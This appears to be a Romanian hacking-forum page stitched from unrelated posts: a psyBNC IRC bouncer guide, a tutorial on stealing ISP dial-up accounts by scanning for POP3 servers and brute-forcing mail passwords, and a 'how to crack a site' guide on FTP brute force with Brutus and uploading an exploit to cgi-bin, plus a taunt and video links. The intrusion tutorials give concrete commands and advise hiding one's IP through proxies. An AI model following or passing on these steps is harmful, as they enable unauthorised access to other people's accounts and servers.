2) psy-ul iti ascunde adresa reala chiar si in sesiunile DCC. La alte BNC-uri aceasta facilitate nu exista. Deci te vei ascunde nitzel 3) Se pot conecta (linka) mai multe psyBNC-uri intre ele, putand astfel folosi vhost-urile altora sau ... se creaza astfel un mic server de IRC care este de fapt reteaua de psyBNC-uri. Mai sunt o groaza de alte facilitati, recomand descarcarea sursei de psyBNC si citirea fisierului README. Acum ... in prima parte a acestui tutorial, sectiunea de baza, sper ca aveti ceva cunostinte despre shell-uri si IRC in genere. Unora le este de ajuns si putin-ul dar partea cea mai frumoasa este putin mai complicata. Configurare si compilare
-
Daca nu stiti nimic despre BNC-uri, un BNC este o prescurtare de la un bouncer. Un bnc actioneaza ca un proxy de irc, lasandu- te sa iti ascunzi adresa reala, folosind hosturi virtuale (vhost-uri) etc. Care sunt avantajele ? Pai te protejeaza de cei care vor sa te dea jos din retea. Oricine uraste sa fie deconectat iar cu un bnc instalat pe un shell bun ar trebui sa fii cat de cat imun. Totusi, se poate gasi cineva care sa "dea" in tine dar se presupune ca provideru` de unde ai shellu` are o banda larga care isi permite sa accepte multe pachete. Deci totul depinde de conexiunea serverului pe care ai shellu`. Totusi ... de ce psyBNC ? Sunt o groaza de surse pentru BNC-uri cele mai notabile fiind EZbnc-urile. Toate fac acelasi lucru: iti ascund adresa reala. Totusi este o diferenta. Folosesc psyBNC-ul si sunt cateva lucruri care imi plac la el. Am sa enumar cateva din ele: 1) Vei fi intotdeauna conectat la IRC. Chiar daca inchizi clientul tau de IRC, conexiunea psy-ului cu IRC-ul ramane valabila. Astfel, cand te vei conecta la el vei intra direct pe canalele pe care erai. Inca ceva ... nick-ul iti ramane pe IRC (daca ai nevoie de aceasta facilitate) sau poti mentine @p-ul pe canale.
-
Conturi de dial-up - Cum poti sa gasesti conturi dial-up Ne vom ocupa in acest tutorial de conturile dial-up. Cerinte: programul Fscan pe care-l puteti lua de pe sectiunea Download sau de pe www.google.com Continut: 1)Strangerea de informatii(partea cea mai grea de fapt) 2)Atacul propriu zis. 3)contul dial-up in registrii windows-ului 1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate, aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail. Spre exemplu ISP-ul meu este firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "crystygye". Atunci adresa mea de mail este crystygye@ISP.ro sau crystygye@server.ISP.ro.Deci daca aflu parola de la mail aflu si parola folosita pentru dial-up. Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis, iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand: tracert -j www.ISP.ro Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu strica sa stim daca are si portul 79 deschis..... fscan -vbp 79,110 154.14.14.1-254 Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar este serverul cautat,lansam din Start/Run urmatoarea comanda: telnet 154.14.14.144 110 Dupa ce ne conectam tastam user blahbla si vom primi ceva de genul +OK apoi tastam pass blabla si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!. Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa: telnet server_de primire 110 user userul_tau pass parola_ta si iti poti citi mail-ul folosind telnetul. 2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare. In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force". Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii. Intai incercati daca userul si parola nu sunt identice,am intalnit cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "finger" a programului mIRC. Posibilitatile sunt nesfarsite,incercati.... 3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii" Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta
-
Comenzi BNC /addserver [server]:[port] pentru a adauga un server in lista. Acesta este primul lucru care trebuie facut. Server-ul poate fi in forma non sau alfanumerica. /listservers pentru a vedea lista serverlor adaugate. /delserver [n] sterge serverul #[n] obtinut in urma folosirii comenzii /listservers. /jump deconecteaza psy-ul de la serverul curent si il conecteaza la urmatorul server din lista. /bquit deconecteaza psy-ul de la IRC si il tine asta pana il fortati sa se conecteze ( Nu prea este cazul sa o folositi ). /bconnect forteaza psy-ul sa se conecteze la IRC ( presupunand ca aveti cel putin un server adaugat in lista ). Retineti ca psy-ul ramane conectat la IRC chiar daca dvs nu mai sunteti conectat la el. Deci iata aici cateva comenzi utile pentru aceasta facilitate: /setleavemsg [mesaj] seteaza mesajul care va fi lasat pe toate canalele dupa ce va deconectati de la psy. /setaway [mesaj] seteaza mesajul de away care va aparea celor care iti vor da /whois sau iti vor trimite mesaje. /setawaynick [nick] seteaza nick-ul pe care il va folosi psy-ul atata timp cat nu sunteti conectat la el ( xyz[AW] de exemplu ). Inca o facilitate pe care o ofera psyBNC-ul datorita mentinerii conexiunii cu IRC-ul sunt logurile.Astfel puteti vizualiza toate mesajele pe care le-ati primit in timp ce nu ati fost conectat la psy. Iata aici cele doua comenzi utile: /playprivatelog pentru a vedea logurile. /eraseprivatelog pentru a le sterge. psyBNC-ul are o optiune al draku` de mishto. Suporta encriptarea textului trimis unei persoane sau unui canal. Fiecare persoana trebuie sa aiba parola ca sa poata intelege ceea ce vorbiti. Plus ca trebuie sa aiba psy A ... si inca ceva ... te face sa arati mai a haxorel Iata aici comenzi utile pentru a putea folosi aceasta facilitate: /encrypt [parola]:[canal/persoana] seteaza parola pentru canalul/persoana respectiva. /listencrypt pentru a vedea lista de canale/persoane asupra carora a fost aplicata encriptarea. /delencrypt pentru a sterge encriptarea cu numarul #[n] obtinuta in urma comenzii /listencrypt. psyBNC-ul are facilitatea de multi-user ( mai multi utilizatori pot folosi acelasi psyBNC ). Puteti adauga, sterge utilizatori, puteti sa le dati dreptul de a face acelasi lucru sau chiar sa le schimbati parola. Totul e la fel de simplu. Iata aici cateva comenzi pentru administrarea utilizatorilor: /adduser [utilizator]:[numele real] adauga utilizatorul [utilizator] cu full name-ul [numele real].[utilizator] este ident-ul iar [numele real] este full name-ul care vor aparea in urma unei comenzi /whois
-
Tehnica Brute Force - Cum sa spargi un site Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate. Pentru acest lucru este necesar un program de brute force cracking. Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force', pe care il gasiti la sectiunea DOWNLOAD. Dar cel mai bine se intelege privind urmatorul exemplu. Sa presupunem ca serverul www.server.com are client Incercam'>http://ftp. Incercam prima data o conexiune: Deschidem Start/Run si tastam: open 220 220 220 220 220 connecting'>http://ftp.server.home.ro 220 220 220 220 220 connecting to server running WU_FTPD(ftp.debbie.server.com): {introduceti debbbie} password:******** userid/password incorrect login failed goodbye Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa ne ofere doua informatii de mare inportanta: username:Debbie tipul de server:WU_FTPD Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking. Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile. Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'. Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati. Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite. Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora. Initial eu obisnuiesc sa fac urmatoarele setari privind parola: length min:0 length max 10 custom char :0123456789 In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere: custom char:abcderftyijop Aceasta metoda este absolut sigura dar are doua dezavantaje majore: 1)Timpul mare de asteptare (1 ora-cateva luni depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o problema(firma sau alta institutie). 2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program precum 'jammer' care zice-se ca ascunde numarul de telefon. Voi mai da un exempu de bug in ftp: open http://ftp.server.com 220 220 220 ... connecting to........(ftp.server.com):ftp {introduceti un user implicit} password:guest ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces' Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!! Cautati un exploit adecvat pentru sistemul de operare respectiv (stiti cum sa-l aflati) il puneti pe desktop, apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe): cd cgi-bin(sau ce director gasiti) put expl.exe apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin): http://www.server.com/cgi-bin/expl.exe
-
tzi la spart ! deci tzia dat de gandit ca`i o problema cu securitatea !! asai sau nu e asa ??? remediazatzil .... !!
-
http://www.youtube.com/watch?v=c-i_OW90YcU Un Om Norocos :) http://www.youtube.com/watch?v=JEarkOd4l98 Film cu prosti